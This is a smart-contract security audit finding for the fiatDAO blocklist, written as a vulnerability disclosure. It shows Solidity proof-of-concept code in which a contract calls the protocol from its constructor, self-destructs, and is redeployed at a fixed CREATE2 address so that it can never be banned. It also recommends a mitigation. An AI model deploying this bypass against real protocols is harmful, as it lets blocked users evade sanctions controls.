Code4rena (code423n4) audit finding: 2022-08-fiatdao-findings, issue 168
Aug 15, 2022

Users can create an un-bannable contract


Lines of code
<https://github.com/code-423n4/2022-08-fiatdao/blob/fece3bdb79ccacb501099c24b60312cd0b2e4bb2/contracts/features/Blocklist.sol#L23>

Vulnerability details

Impact

Users can create a contract that the blocklist can never ban: the contract makes its calls into fiatDAO from its constructor, where its own code is not yet stored, and then self-destructs before the constructor returns, so its address never holds code at any point the blocklist manager could observe. Using `create2`, the attacker can also redeploy the contract to the same address every time they want to interact with the fiatDAO contracts, so the interacting address stays stable while remaining impossible to ban.

Remember that a contract calling external functions from its constructor always has an extcodesize of 0 at that point, and `_isContract` relies on extcodesize to decide whether an address may be blocked. The pattern also survives EIP-6780 (Cancun): `selfdestruct` still deletes an account that was created in the same transaction, which is exactly what happens here, so the address is empty again once the attack transaction ends.

Proof of Concept

Example of a contract that can never be banned, because extcodesize is 0 for its address both while it runs (it is still in its constructor) and afterwards (it has self-destructed).
It can be deployed deterministically to the same address with create2 and make arbitrary calls to fiatDAO:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Attacker {
    // Every call below is made while this contract's code is not yet stored,
    // so extcodesize(address(this)) is 0 from the callee's point of view.
    constructor(address target, bytes[] memory callDatas) {
        for (uint256 i; i < callDatas.length; i++) {
            (bool ok, ) = target.call(callDatas[i]);
            require(ok, "call failed");
        }

        // Remove the code again before the transaction ends, so the address
        // never holds code that the blocklist could observe.
        selfdestruct(payable(msg.sender));
    }
}

Tools Used

Solidity

Recommended Mitigation Steps

I recommend allowing the blocklist to ban any address and dropping the `_isContract` check. There is no reliable on-chain way to control how users prepare their malicious contracts, and an extcodesize-based guard is an arbitrary barrier that a constructor-time caller passes trivially. Banning an address that currently holds no code costs nothing, while refusing to ban it lets this attacker interact with the protocol indefinitely.
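The following is an added, self-contained illustration of both the proof of concept and the recommended mitigation; it is example code written for this page, not code from the fiatDAO repository or from the finding's author. `Target`, `AttackerFactory`, `PermissiveBlocklist`, the fixed `SALT` and the function names `ping`, `attack`, `predict` and `blockAddress` are all assumed names. Compared with the snippet above, the attacker reads its instructions from the factory instead of taking constructor arguments, so its init code, and therefore its CREATE2 address, is identical on every deployment even when the calls it makes differ.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

// Stand-in for a fiatDAO contract the attacker wants to reach. It only records
// what the caller looks like at call time. Hypothetical; not the project's code.
contract Target {
    address public lastCaller;
    uint256 public lastCallerCodeSize;

    function ping() external {
        address c = msg.sender;
        uint256 size;
        assembly { size := extcodesize(c) }
        lastCaller = c;
        lastCallerCodeSize = size; // 0 when the caller is still in its constructor
    }
}

interface IAttackerFactory {
    function pending() external view returns (address target, bytes[] memory callDatas);
}

// The attacker from the finding. No constructor arguments: the init code hash is
// constant, so CREATE2 with a fixed salt always lands on the same address.
contract Attacker {
    constructor() {
        (address target, bytes[] memory callDatas) = IAttackerFactory(msg.sender).pending();
        for (uint256 i; i < callDatas.length; i++) {
            // Made while this contract's code is not yet stored (extcodesize == 0).
            (bool ok, ) = target.call(callDatas[i]);
            require(ok, "call failed");
        }
        // Created and destroyed in one transaction: the account is removed when the
        // tx ends, also under EIP-6780, so the address is empty again afterwards.
        selfdestruct(payable(msg.sender));
    }
}

// Deploys Attacker at the same address for every attack transaction (assumed design).
contract AttackerFactory is IAttackerFactory {
    bytes32 public constant SALT = keccak256("fixed-salt");
    address private _target;
    bytes[] private _callDatas;

    function pending() external view override returns (address, bytes[] memory) {
        return (_target, _callDatas);
    }

    // One attack per transaction: the previous Attacker instance at this address is
    // only cleared when the transaction that created it finishes.
    function attack(address target, bytes[] calldata callDatas) external returns (address deployed) {
        _target = target;
        delete _callDatas;
        for (uint256 i; i < callDatas.length; i++) {
            _callDatas.push(callDatas[i]);
        }
        deployed = address(new Attacker{salt: SALT}());
        require(deployed == predict(), "address changed");
    }

    // The address the blocklist manager would have to ban. Outside an attack
    // transaction it holds no code, so an extcodesize-based guard rejects it.
    function predict() public view returns (address) {
        bytes32 initCodeHash = keccak256(type(Attacker).creationCode);
        return address(uint160(uint256(keccak256(
            abi.encodePacked(bytes1(0xff), address(this), SALT, initCodeHash)
        ))));
    }
}

// Minimal blocklist that accepts any address, as the mitigation recommends.
// Hypothetical sketch, not the project's Blocklist.sol.
contract PermissiveBlocklist {
    address public immutable manager;
    mapping(address => bool) private _blocklist;

    constructor(address manager_) {
        manager = manager_;
    }

    // No `_isContract(addr)` requirement: the manager can ban the CREATE2 address
    // above even though it has no code at the moment this is called.
    function blockAddress(address addr) external {
        require(msg.sender == manager, "Only manager");
        _blocklist[addr] = true;
    }

    function isBlocked(address addr) external view returns (bool) {
        return _blocklist[addr];
    }
}
```

To reproduce the behaviour, deploy `Target` and `AttackerFactory`, then call `attack(target, [abi.encodeWithSignature("ping()")])` in two separate transactions: `Target.lastCaller` is the same address both times and `Target.lastCallerCodeSize` is 0 on each, while `extcodesize(factory.predict())` is 0 between the transactions. A blocklist that requires `_isContract` can therefore never ban that address; `PermissiveBlocklist.blockAddress(factory.predict())` can.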

